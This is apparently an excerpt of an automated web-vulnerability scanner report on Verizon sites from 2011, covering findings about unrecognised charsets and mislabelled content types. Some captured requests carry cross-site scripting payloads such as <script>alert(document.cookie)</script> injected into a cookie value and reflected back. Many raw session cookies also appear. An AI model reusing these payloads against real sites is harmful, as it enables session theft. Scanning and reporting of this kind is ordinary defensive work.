__utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html
Expires: Mon, 05 Sep 2011 22:24:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:12 GMT
Content-Length: 1034
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>vzTracker</title>
       <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
       <meta content="C#" na
...[SNIP]...

25. HTML uses unrecognised charset previous next
There are 10 instances of this issue:

http://search.vzw.com/
https://secure.opinionlab.com/ccc01/comment_card.asp
https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp
http://www22.verizon.com/ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm
http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
http://www22.verizon.com/content/ContactUs/
http://www22.verizon.com/residentialhelp/fiostv
http://www22.verizon.com/residentialhelp/inhomeagent
http://www22.verizon.com/residentialhelp/inhomeagent/
http://www22.verizon.com/residentialhelp/phone

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

25.1. http://search.vzw.com/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://search.vzw.com
Path:	/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

latin-1

Request

GET / HTTP/1.1
Host: search.vzw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:40 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Connection: close
Content-Length: 79416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Verizon Wireless Se
...[SNIP]...
<meta name="m4" content="|" />

   <meta http-equiv="content-type" content="text/html; charset=latin-1" />
   <meta http-equiv="Content-Language" content="en-us" />
...[SNIP]...

25.2. https://secure.opinionlab.com/ccc01/comment_card.asp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	https://secure.opinionlab.com
Path:	/ccc01/comment_card.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF-16
UTF-8

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.3. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	https://secure.opinionlab.com
Path:	/ccc01/comment_card_json_4_0_b.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF-16
UTF-8

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.4. http://www22.verizon.com/ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

utf-8
windows-1251

Request

Response

25.5. http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

utf-8
windows-1251

Request

GET /ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230802
Expires: Mon, 05 Sep 2011 22:24:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<HEAD id="ctl00_head"><title>
Verizon |
...[SNIP]...
</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" />
...[SNIP]...

25.6. http://www22.verizon.com/content/ContactUs/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www22.verizon.com
Path:	/content/ContactUs/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

utf-8
windows-1251

Request

Response

25.7. http://www22.verizon.com/residentialhelp/fiostv previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www22.verizon.com
Path:	/residentialhelp/fiostv

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

utf-8
windows-1251

Request

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 239405
Expires: Mon, 05 Sep 2011 22:24:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:31 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | FiOS TV
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Visual    Studio 7.0" name="GENERATOR" />
...[SNIP]...

25.8. http://www22.verizon.com/residentialhelp/inhomeagent previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www22.verizon.com
Path:	/residentialhelp/inhomeagent

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

utf-8
windows-1251

Request

GET /residentialhelp/inhomeagent HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 215655
Expires: Mon, 05 Sep 2011 22:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:25 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/l
...[SNIP]...
</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" />
...[SNIP]...

25.9. http://www22.verizon.com/residentialhelp/inhomeagent/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www22.verizon.com
Path:	/residentialhelp/inhomeagent/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

utf-8
windows-1251

Request

GET /residentialhelp/inhomeagent/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 215661
Expires: Mon, 05 Sep 2011 22:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:25 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/l
...[SNIP]...
</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" />
...[SNIP]...

25.10. http://www22.verizon.com/residentialhelp/phone previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www22.verizon.com
Path:	/residentialhelp/phone

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

utf-8
windows-1251

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230544
Expires: Mon, 05 Sep 2011 22:39:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:39:57 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:39:57 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Visual    Studio 7.0" name="GENERATOR" />
...[SNIP]...

26. Content type incorrectly stated previous next
There are 73 instances of this issue:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb
http://cache.vzw.com/fonts/verizonApex-book-ex.woff
http://cache.vzw.com/globalnav/globalnavmenu.txt
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/fonts/apex.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/fonts/superscript.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf
http://cache.vzw.com/testNtarget/thin_omninav2.0.4.js
http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js
http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js
https://collaborateext.verizon.com/aims/encore/VZCTC.serv
https://collaborateext.verizon.com/pre/pre/pre.serv
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
http://get.adobe.com/cfusion/search/buddy/searchbuddy.cfm
http://get.adobe.com/cfusion/search/index.cfm
http://headlines.verizon.com/headlines/GetPoll
http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/Core.jsp
http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp
http://headlines.verizon.com/headlines/resources/images/featuredArticle.png
http://headlines.verizon.com/headlines/resources/images/followUsOnTwitter.png
http://headlines.verizon.com/headlines/resources/images/navOff_02.png
http://headlines.verizon.com/headlines/resources/images/navOff_03.png
http://headlines.verizon.com/headlines/resources/images/navOff_04.png
http://headlines.verizon.com/headlines/resources/images/navOff_05.png
http://headlines.verizon.com/headlines/resources/images/navOff_06.png
http://headlines.verizon.com/headlines/resources/images/navOff_07.png
http://headlines.verizon.com/headlines/resources/images/navOff_08.png
http://headlines.verizon.com/headlines/resources/images/navOn_01.png
http://headlines.verizon.com/headlines/resources/images/pageTitleHeadlines.png
http://headlines.verizon.com/headlines/resources/images/primaryNavPipe.png
http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_pause.gif
http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_right.gif
http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_rightOn.gif
http://headlines.verizon.com/headlines/resources/images/twit_pipe.png
http://headlines.verizon.com/headlines/resources/images/verizonEmail.png
http://maps.google.com/maps/api/js
http://s.xp1.ru4.com/meta
http://sales.liveperson.net/hcp/html/mTag.js
http://sales.liveperson.net/visitor/addons/deploy.asp
https://seal.verisign.com/getseal
https://secure.opinionlab.com/rate36_json.asp
https://secure.opinionlab.com/rate36s.asp
http://sr2.liveperson.net/hcp/html/mTag.js
http://syndicate.verizon.com/ads/js.ashx
http://syndicate.verizon.net/ads/js.ashx
http://syndicate.verizon.net/ads/scripthandler.ashx
http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard
http://www.connecttoverizon.com/favicon.ico
http://www.google.com/search
http://www.verizonbusiness.com/crossdomain.xml
http://www.verizonbusiness.com/sitemap/tips.xml
http://www.verizonbusiness.com/templates/vzbar/bertprefs.json
http://www22.verizon.com/content/verizonglobalhome/gPromo.aspx
http://www22.verizon.com/content/verizonglobalhome/setValues.aspx
http://www22.verizon.com/foryourhome/MyAccount/Unprotected/common/dock_new.aspx
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Images/truste_logo2.gif
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_continueS.gif
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_ok.gif
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/headers/bk.gif
https://www22.verizon.com/ForYourSmallBiz/GoFlow/Common/Images/OrderNew/buttons/gray.gif
https://www22.verizon.com/content/verizonglobalhome/gPromo.aspx
https://www22.verizon.com/foryoursmallbiz/goflow/common/images/OrderNew/form/checkbox.gif
https://www22.verizon.com/includes/cache/getwb31.asp
https://www22.verizon.com/includes/javascript/commonjs/
https://www22.verizon.com/includes/javascript/oo_engine_c.js

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.2. http://cache.vzw.com/fonts/verizonApex-book-ex.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/fonts/verizonApex-book-ex.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/verizonApex-book-ex.woff HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/stylesheets/fonts.css?v=11-09
Origin: http://www.verizonwireless.com

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Tue, 12 Jul 2011 03:35:57 GMT
Content-Length: 26612
ETag: "67f4-4e1bc11d"
Accept-Ranges: bytes
Expires: Mon, 05 Sep 2011 22:15:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:15:05 GMT
Connection: close
Access-Control-Allow-Origin: http://www.verizonwireless.com

wOFFOTTO..g................................CFF ...0..R....J..9.FFTM..S.........R.':GDEF..S....C...P. ..GPOS..T(......2& .cBGSUB..Z........^..5.OS/2..^....Z...`:C..cmap..^....T...^.f..head..a8...4...6
...[SNIP]...

26.3. http://cache.vzw.com/globalnav/globalnavmenu.txt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/globalnav/globalnavmenu.txt

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /globalnav/globalnavmenu.txt?lpd=2011Jul31030844 HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: V1Z2=CT

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Sun, 31 Jul 2011 07:16:28 GMT
Content-Length: 35653
ETag: "8b45-4e35014c"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:14:34 GMT
Connection: close

gNav.buildNav({"mainNavLinks":[{"menuItem":{"label":"Explore","hbx":"//global//explore","role":{"signedOut":{"path":"/b2c/explore","domain":"vzw","id":"gn13"}},"columns":[[{"menuItem":{"label":"Why Ve
...[SNIP]...

26.4. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/fonts/apex.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
